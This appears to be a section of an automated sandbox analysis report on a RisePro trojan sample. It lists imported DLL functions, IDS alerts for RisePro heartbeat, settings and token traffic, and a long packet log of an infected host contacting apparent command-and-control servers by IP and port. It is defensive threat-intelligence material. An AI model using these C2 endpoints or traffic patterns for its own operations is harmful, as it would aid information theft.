gdiplus.dll	GdipGetImageEncoders
SETUPAPI.dll	SetupDiEnumDeviceInfo
ntdll.dll	RtlUnicodeStringToAnsiString
RstrtMgr.DLL	RmStartSession
KERNEL32.dll	GetSystemTimeAsFileTime
KERNEL32.dll	HeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/06/24-07:47:00.337121	TCP	2049060	ET TROJAN RisePro TCP Heartbeat Packet	49739	50500	192.168.2.4	193.233.132.226
05/06/24-07:48:32.668644	TCP	2046268	ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings)	49739	50500	192.168.2.4	193.233.132.226
05/06/24-07:48:34.351264	TCP	2046269	ET TROJAN [ANY.RUN] RisePro TCP (Activity)	49739	50500	192.168.2.4	193.233.132.226
05/06/24-07:47:00.569492	TCP	2046266	ET TROJAN [ANY.RUN] RisePro TCP (Token)	50500	49739	193.233.132.226	192.168.2.4
05/06/24-07:48:31.228011	TCP	2046267	ET TROJAN [ANY.RUN] RisePro TCP (External IP)	50500	49739	193.233.132.226	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 6, 2024 07:52:16.011749029 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:52:16.275433064 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:16.275521040 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:52:16.290172100 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:52:16.539093971 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:16.589452028 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:52:16.627806902 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:19.667604923 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:52:20.128273964 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:31.364360094 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:31.417727947 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:52:31.564912081 CEST	49739	443	192.168.2.4	34.117.186.192
May 6, 2024 07:52:31.564939022 CEST	443	49739	34.117.186.192	192.168.2.4
May 6, 2024 07:52:31.565021992 CEST	49739	443	192.168.2.4	34.117.186.192
May 6, 2024 07:52:31.568456888 CEST	49739	443	192.168.2.4	34.117.186.192
May 6, 2024 07:52:31.568468094 CEST	443	49739	34.117.186.192	192.168.2.4
May 6, 2024 07:52:31.803031921 CEST	443	49739	34.117.186.192	192.168.2.4
May 6, 2024 07:52:31.803117990 CEST	49739	443	192.168.2.4	34.117.186.192
May 6, 2024 07:52:31.807871103 CEST	49739	443	192.168.2.4	34.117.186.192
May 6, 2024 07:52:31.807876110 CEST	443	49739	34.117.186.192	192.168.2.4
May 6, 2024 07:52:31.808074951 CEST	443	49739	34.117.186.192	192.168.2.4
May 6, 2024 07:52:31.855103970 CEST	49739	443	192.168.2.4	34.117.186.192
May 6, 2024 07:52:31.915019989 CEST	49739	443	192.168.2.4	34.117.186.192
May 6, 2024 07:52:31.960120916 CEST	443	49739	34.117.186.192	192.168.2.4
May 6, 2024 07:52:32.064851999 CEST	443	49739	34.117.186.192	192.168.2.4
May 6, 2024 07:52:32.064946890 CEST	443	49739	34.117.186.192	192.168.2.4
May 6, 2024 07:52:32.065030098 CEST	49739	443	192.168.2.4	34.117.186.192
May 6, 2024 07:52:32.079459906 CEST	49739	443	192.168.2.4	34.117.186.192
May 6, 2024 07:52:32.079473972 CEST	443	49739	34.117.186.192	192.168.2.4
May 6, 2024 07:52:32.079487085 CEST	49739	443	192.168.2.4	34.117.186.192
May 6, 2024 07:52:32.079495907 CEST	443	49739	34.117.186.192	192.168.2.4
May 6, 2024 07:52:32.193568945 CEST	49740	443	192.168.2.4	104.26.5.15
May 6, 2024 07:52:32.193597078 CEST	443	49740	104.26.5.15	192.168.2.4
May 6, 2024 07:52:32.193777084 CEST	49740	443	192.168.2.4	104.26.5.15
May 6, 2024 07:52:32.194025993 CEST	49740	443	192.168.2.4	104.26.5.15
May 6, 2024 07:52:32.194044113 CEST	443	49740	104.26.5.15	192.168.2.4
May 6, 2024 07:52:32.424468040 CEST	443	49740	104.26.5.15	192.168.2.4
May 6, 2024 07:52:32.424659014 CEST	49740	443	192.168.2.4	104.26.5.15
May 6, 2024 07:52:32.426188946 CEST	49740	443	192.168.2.4	104.26.5.15
May 6, 2024 07:52:32.426197052 CEST	443	49740	104.26.5.15	192.168.2.4
May 6, 2024 07:52:32.426393032 CEST	443	49740	104.26.5.15	192.168.2.4
May 6, 2024 07:52:32.427654982 CEST	49740	443	192.168.2.4	104.26.5.15
May 6, 2024 07:52:32.472120047 CEST	443	49740	104.26.5.15	192.168.2.4
May 6, 2024 07:52:32.824759960 CEST	443	49740	104.26.5.15	192.168.2.4
May 6, 2024 07:52:32.824830055 CEST	443	49740	104.26.5.15	192.168.2.4
May 6, 2024 07:52:32.824987888 CEST	49740	443	192.168.2.4	104.26.5.15
May 6, 2024 07:52:32.825084925 CEST	49740	443	192.168.2.4	104.26.5.15
May 6, 2024 07:52:32.825102091 CEST	443	49740	104.26.5.15	192.168.2.4
May 6, 2024 07:52:32.825112104 CEST	49740	443	192.168.2.4	104.26.5.15
May 6, 2024 07:52:32.825115919 CEST	443	49740	104.26.5.15	192.168.2.4
May 6, 2024 07:52:32.825629950 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:52:33.238132000 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:34.802907944 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:34.855086088 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:52:41.567751884 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:41.620784044 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:52:41.742842913 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:52:42.142086983 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:46.196741104 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:46.261517048 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:52:46.287357092 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:52:46.643322945 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:50.822671890 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:50.839704037 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:52:51.142761946 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:53.904308081 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:53.948997974 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:52:54.011696100 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:52:54.330300093 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:57.042907000 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:52:57.439495087 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:59.713397026 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:52:59.761538029 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:01.116835117 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:01.122132063 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:01.395804882 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:01.398749113 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:01.468810081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:01.662120104 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:01.662167072 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:01.662188053 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:01.662201881 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:01.662241936 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:01.662260056 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:01.662499905 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:01.662513018 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:01.662569046 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:01.721533060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:01.721592903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:01.721796036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:01.925606012 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:01.925683022 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:01.925697088 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:01.925770998 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:01.925919056 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:01.925930977 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:01.925940037 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:01.925950050 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:01.926028013 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:01.926105976 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:01.926176071 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:01.926177025 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:01.926235914 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:01.974927902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:01.974992990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:01.978513956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.189094067 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.189152956 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.189189911 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.189218998 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.189229965 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.189230919 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.189291954 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.189295053 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.189358950 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.189440012 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.189511061 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.189515114 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.189652920 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.189702988 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.189819098 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.189841986 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.189851999 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.189888954 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.189945936 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.190059900 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.190148115 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.190160990 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.190171003 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.190232992 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.190541029 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.190565109 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.190638065 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.233366013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.233378887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.233390093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.233428955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.233468056 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.233498096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.233546972 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.452558994 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.452627897 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.452634096 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.452718973 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.452761889 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.452773094 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.452783108 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.452843904 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.452864885 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.452944994 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.453021049 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.453032970 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.453130007 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.453207970 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.453243971 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.453330040 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.453424931 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.453439951 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.453480959 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.453522921 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.453551054 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.453732967 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.453742981 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.453819036 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.453823090 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.453890085 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.453917980 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.453999043 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.454011917 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.454072952 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.454101086 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.454199076 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.454231024 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.454252958 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.454278946 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.454312086 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.454430103 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.454510927 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.454510927 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.454525948 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.454535007 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.454637051 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.454684973 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.454762936 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.454778910 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.454788923 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.454798937 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.454858065 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.454907894 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.455003023 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.455012083 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.486310959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.486371994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.486387968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.486401081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.486412048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.486423969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.486434937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.486438990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.486484051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.486552000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.486643076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.486654997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.486700058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.716017008 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.716083050 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.716207027 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.716217995 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.716384888 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.716418028 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.716542959 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.716552973 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.716562033 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.716705084 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.716814041 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.716953993 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.717061996 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.717175007 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.717323065 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.717519999 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.717530966 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.717540026 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.717550039 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.717590094 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.717600107 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.717653036 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.717782021 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.717900991 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.717911959 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.718044996 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.718055964 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.718106031 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.718220949 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.718233109 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.718353033 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.718447924 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.718524933 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.718683958 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.718779087 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.718899012 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.718909979 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.719388962 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.719399929 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.719408035 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.719419003 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.719686985 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.719696999 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.719705105 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.719717026 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.719724894 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.719935894 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.720241070 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.720252037 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.720261097 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.720271111 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.720280886 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.720289946 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.720299006 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.720313072 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.720330000 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.720340014 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.720369101 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.722657919 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:02.739316940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.739495993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.739509106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.739515066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.739558935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.739569902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.739581108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.739588022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.739598989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.739604950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.739609957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.739622116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.739633083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.739646912 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.739645958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.739661932 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.739664078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.739680052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.739686012 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.739691973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.739715099 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.739741087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.983619928 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.983711004 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.983911037 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.983974934 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.985888004 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:02.992351055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992362976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992372990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992384911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992396116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992403984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.992430925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.992451906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992465019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992490053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992501974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.992518902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992527962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.992552996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992563009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.992572069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992592096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.992604971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.992630005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992646933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992652893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992664099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992676020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.992702961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992705107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.992714882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992717028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.992749929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.992757082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.992855072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992867947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992882013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992893934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992898941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992902040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:02.992904902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992916107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992929935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:02.992938995 CEST	49741	80	192.168.2.4	5.42.66.10
